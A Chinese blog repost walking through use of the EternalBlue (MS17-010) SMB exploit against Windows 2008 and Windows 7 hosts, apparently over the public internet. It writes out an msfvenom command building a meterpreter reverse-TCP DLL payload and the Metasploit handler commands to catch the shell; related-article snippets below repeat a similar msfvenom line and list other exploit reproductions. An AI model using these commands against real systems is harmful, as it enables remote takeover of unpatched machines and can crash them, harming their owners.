方程式漏洞之复现window2008/win7 远程命令执行漏洞

最新推荐文章于 2023-03-20 11:17:39 发布
最新推荐文章于 2023-03-20 11:17:39 发布
阅读量218 收藏
点赞数
原文链接:http://www.cnblogs.com/xishaonian/p/6752605.html
版权

前几天就想写的,因为一些缘故就没写。此次是在外网环境下进行的。大家在内网中也一个样。

方法:

  使用Eternalblue模块,剑测是否有漏洞然后msf生成一个dll直接反弹shell.

PS:win版本的不知道缘何生成出来的dll是0kb 我就在自己本地的虚拟机生成了一个dll。生成dll命令

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=6566 -f dll > /opt/xishaonian.dll

然后copy到了自己的测试机。

测试机IP:118.244.x.x

被攻击者IP:119.29.x.x

MSF监听命令:

use exploit/multi/handler

set LHOST 192.168.1.109

set LPORT 6566

set PAYLOAD windows/x64/meterpreter/reverse_tcp

run

成功。

 

在测试当中,发现win7的会被蓝屏,而08的却不会

 

转载于:https://www.cnblogs.com/xishaonian/p/6752605.html

aiquan9342
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
方程式445漏洞检测
11-12
方程式445批量检测工具(MS17-010) 全自动极速版。仅限于检测,请勿非法使用。
实战-使用msf渗透攻击win7主机并远程执行命令
保持微笑的博客
01-14 2356
1.什么是永恒之蓝? 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。 2.通过msf模块获取win7主机远程shell 模块的整体使用流程如下
方程式 Eternalblue 漏洞利用复现
VinK1的博客
04-19 6542
漏洞原理详细的漏洞原理参照文章: http://www.91ri.org/16946.html 懒得点连接的大人们可以看这里: 首先SrvOs2FeaListToNt首先调用SrvOs2FeaListSizeToNt计算pNtFea的大小。这里注意了SrvOs2FeaListSizeToNt函数会修改原始的pOs2Fea中的Length大小,本来Length是一个DWORD, 代码还强制转换
方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记
热门推荐
captain51的博客
04-16 1万+
ETERNALBLUE :是一个0day RCE漏洞利用,影响最新的Windows 2008 R2 SERVER VIA SMB和NBT,利用SMB漏洞,攻击开放445端口的windows机器
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
方程式工具-永恒之蓝 Windows 2008 r2 安装补丁
最新发布
04-12
【1】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0143)(方程式工具-永恒之蓝)[原理扫描] 【2】Microsoft Windows SMB 输入验证漏洞(CVE-2017-0144)(方程式工具-永恒之蓝)[原理扫描] 【3】Microsoft Windows SMB...
【化学方程式配平工具】配平助手v2022
11-10
配平助手用于配平化学方程式、离子方程式、计算反应物和生成物的式量、质量、摩尔数。 更详细的介绍和使用说明请参照软件的“使用说明”窗口。 v2022基于.Net4.8,兼容win10、win11
MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现
Shadow_DAI_990101的博客
09-14 3350
SMB(Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口,SMB使用了NetBIOS的API。等我学会了再写吧…可以先参考如下文章MS08-067复现与简单分析漏洞考古:MS08-067详细分析。
Windows永恒之蓝漏洞复现
pythonZLX的博客
01-05 305
windows 永恒之蓝漏洞复现
漏洞复现 | win7粘滞键漏洞复现
made_cola的博客
03-20 1204
粘滞键是一种快捷键,是为同时按下两个或多个键有困难的人而设计的,要功能是方便Shift、Ctrl、Alt与其他键的组合使用。启动粘滞键可通过单击“开始→设置→控制面板→辅助功能选项”,在“键盘”选项卡下选中“使用粘滞键”来启动。或者连续按shift键五次。开启粘滞键的时候,任务栏右边的系统托盘区会出现粘滞键图标。而攻击者正是利用了其按五次shift键出现弹窗的特性对系统进行攻击。
CVE-2019-0708漏洞复现-kali.2020.4&win7
weixin_43867542的博客
07-19 847
漏洞概述 Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Remote Desktop Services是其中的一个远程桌面服务组件。 Microsoft Remote Desktop Services中存在资源管理错误漏洞。该漏洞源于网络系统或产品对系统资源(如内存、磁盘空间、文件等)的管
Windows支持诊断工具(MSDT)远程代码执行漏洞:CVE-2022-30190学习及复现
加油~
08-17 4253
Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability对应的cve编号为CVE-2022-30190,其能够在非管理员权限、禁用宏且在windows defender开启的情况下绕过防护,达到上线的效果。
经典漏洞MS11_003漏洞复现windows7IE溢出漏洞
乌云__SS的博客
05-23 8815
1.首先打开kali虚拟机和一台windows7 ie8,在windows7查看ip,要想复现需要将windows7的防火墙关闭。 2.在kali虚拟机中ping该虚拟机,查看是否可以ping通。 3.打开msfconsole工具 search ms11_003 use 上面name下的内容粘贴下来 4.show payloads我们选择这一条payloads ...
利用ms17-010 远程执行漏洞渗透Win7,并留下后门
qq_40624810的博客
07-18 4373
一、环境准备 主机 kali :192.168.115.134 靶机win7x64:192.168.115.133 二、渗透 Metasploit 指令学习:https://blog.csdn.net/tan6600/article/details/46845793 这里利用的是win7的ms17-010 远程执行漏洞 先使用auxiliary/scanner/smb/smb_ms17...
[提权]CVE-2018-8120漏洞复现
baguangman5501的博客
08-24 839
0x01 漏洞名称 Windows操作系统Win32k的内核提权漏洞 0x02 漏洞编号 CVE-2018-8120 0x03 漏洞描述 部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用程序可利用该空指针漏洞以内核权限执行任意代码 0x04 影响版本 以下软件版本受到影响。未列出的版本要么超...
Office 远程代码执行漏洞复现过程
技术杂谈
03-30 2947
本文来自作者 肖志华 在 GitChat 上分享 「Office 远程代码执行漏洞复现过程」,「阅读原文」查看交流实录。编辑 | 天津饭直接贴本地复现过程,至于怎么利用还请自己思考。2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的 Office 远程代码执行漏洞(CVE-2017-11882)。该漏洞为 Office 内存破坏漏洞,影响目
CVE-2017-1882漏洞复现(通杀office)
一个安全研究员
01-30 1352
如题
空间平面方程式在工程应用与ExcelVBA的结合
"空间平面方程式在工程上的应用主要体现在解决构造地质学和水利工程中的各种问题。文章通过作者的个人经历,介绍了如何运用空间平面方程式,以及Excel VBA在实际工作中的重要性。作者最初接触Excel仅用于基础的表格...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值